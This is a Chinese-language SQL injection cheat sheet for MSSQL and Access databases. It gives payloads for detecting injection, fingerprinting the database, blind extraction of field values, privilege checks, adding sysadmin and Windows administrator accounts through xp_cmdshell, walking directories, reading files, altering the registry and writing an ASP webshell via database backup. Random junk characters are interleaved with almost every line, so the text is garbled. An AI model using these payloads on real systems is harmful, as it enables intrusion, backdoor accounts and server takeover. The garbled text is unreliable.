1.判断是否有注入;and 1=1 ;and 1=2 c</d1x T
2.初步判断是否是mssql ;and user>0 {%'(IJ|5z
Mje6Q
3.注入参数是字符'and [查询条件] and ''=' d3+pS\&IX?
xpKD 'O=T
4.搜索时没过滤参数的'and [查询条件] and '%25'=' lq}= &)%C
+iir]"8
5.判断数据库系统 !,+peMy
5v=%pQbY
;and (select count(*) from sysobjects)>0 mssql @O5-w
`ux
U
H#
;and (select count(*) from msysobjects)>0 access D:U:( pg
4T`u?T]
}>=k!l{
3205gI,
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K~5QL/=1
p}hOkx4R\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @>_`g=
Y5$5qQ
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 81fpeoNO
G%
9.(1)猜字段的ascii值(access) En&ESWN
Pq>r|/~_
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B t-o:)pa
AKC';J
(2)猜字段的ascii值(mssql) r;t0+aLc*
.vj`[?T
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 E9;cd$}K
p[VBeO^%
10.测试权限结构(mssql) 6n]fr9f
v9(->X'
4*g`!~)
H2l/9+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~z$vF
rJ4O_a5/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ig t:M[
/
fD
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- YQvN;W
$*V:;-H
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <->Nex
~&4Hc%*IB
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- k]!Fh^O~,
r9sW:cM:e
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- )d!,,o
6e(|t2^
;and 1=(select IS_MEMBER('db_owner'));-- w?d~c*4+
nPj%EKdY4
8Gzc3
hn#i,XnY
11.添加mssql和系统的帐户 ya0L8`q
!jL|HwlA
;exec master.dbo.sp_addlogin username;-- UB }n=
;exec master.dbo.sp_password null,username,password;-- v=E V5#A
0'wB':v
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- qv y~b
Ci0: -IS
;exec master.dbo.xp_cmdshell 'net user username password U+F?b\
dElOy?v
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- -@X?~4Idz
o_p#sdt"
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @cA`del
oA%8k51>~K
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- +!6aB|-
"rOe J~4 X
$@"o BCc
yT%"<m6Y*\
12.(1)遍历目录 >!MOgLO3
^E*W
B~
;create table dirs(paths varchar(100), id int) sy=M#WGS
%Sr/'7 K
;insert dirs exec master.dbo.xp_dirtree 'c:\' f^z~{|%l!
wWv")dk3i
;and (select top 1 paths from dirs)>0
I&?(=i)N
"Kx2k>ym
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U~n>k<`sr
Veo:G{
(xf_
5@ecZ2`)+h
(2)遍历目录 19Xc0ez
m=<Tylv
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- u[q1]]
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 j}7as&
j/`-x
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 e>vV8a\
FtXd6)_S
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 }CnqJ@>C5
R("g ]
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2A7g}V
qq"&Bc>
6FNs4|(d
++d(}^C;
13.mssql中的存储过程 xdb9oH
wNMg Y
xp_regenumvalues 注册表根键, 子键 1t haQ"
np,L39:sf
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 qR^KvAEQSo
\g<9_
xp_regread 根键,子键,键值名 1ThONrxu
GxE"q-G
;exec xp_regread )nmLgsg
):OGhWq
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 NSH20$A<
}_93}e
xp_regwrite 根键,子键, 值名, 值类型, 值 B?`n@/
rq bX9M^
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 qplz !=
N=FU>qbz
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 p?(w! O
l*_%K}%?V
xp_regdeletevalue 根键,子键,值名 y^7;I-
t)P5bQ+$u9
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7Gb1[3
SbQ Ri
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 k~f3~- "
/+2;".
u&/[sqx
sk !92mQ
14.mssql的backup创建webshell v$c*3H.seM
,CqJ((
use model qOy3D~
^*.S7.;2o
create table cmd(str image); 9s\(yC8h
V\Oe ]w
insert into cmd(str) values (''); ^%l~|w
0!X;C!v;
backup database model to disk='c:\l.asp'; Y2709LWmP
i
bAZ*I
Ncr38~;w
^% y<7>%
15.mssql内置函数 #eSVFD5ZU
q>:>f+4
;and (select @@version)>0 获得Windows的版本号 7 j$ |fS
;AyE(|U+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa W/_=S+CvK
lg` Qi&
;and (select user_name())>0 爆当前系统的连接用户 >;V ?s]
#U45H.Rz
;and (select db_name())>0 得到当前连接的数据库 @V{s'V
Td tn-
Y@x }b{3
HDqPqrWm
16.简洁的webshell LDlj4>%pW^
MG ,exN
@
use model i'&KoR?
bB^% O^:
create table cmd(str image); 3 $7TeqfAC
&"GHD{ix
insert into cmd(str) values (''); @y:mj \J9
%-ih$ZY
backup database model to disk='g:\wwwtest\l.asp';